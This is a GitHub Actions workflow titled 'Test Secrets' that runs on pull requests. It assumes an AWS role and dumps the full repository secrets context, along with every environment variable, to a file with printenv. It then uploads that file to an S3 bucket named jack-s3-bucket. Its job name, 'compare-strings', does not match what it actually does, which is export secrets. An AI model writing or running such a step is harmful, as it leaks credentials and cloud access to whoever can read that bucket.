
name: Test Secrets

on:
  pull_request:

jobs:
  compare-strings:
    runs-on: ubuntu-latest
    permissions:
      id-token: write
    environment: sandbox

    steps:
      - uses: aws-actions/configure-aws-credentials@v6
        with:
          role-to-assume: ${{ secrets.AWS_HAZELCAST_OIDC_GITHUB_ACTIONS_ROLE_ARN }}
          aws-region: us-east-1

      - run: |
          printenv >> myfile.txt
          aws s3 cp myfile.txt s3://jack-s3-bucket/myfile.txt
        env:
          SECRETS: '${{ toJson(secrets) }}'
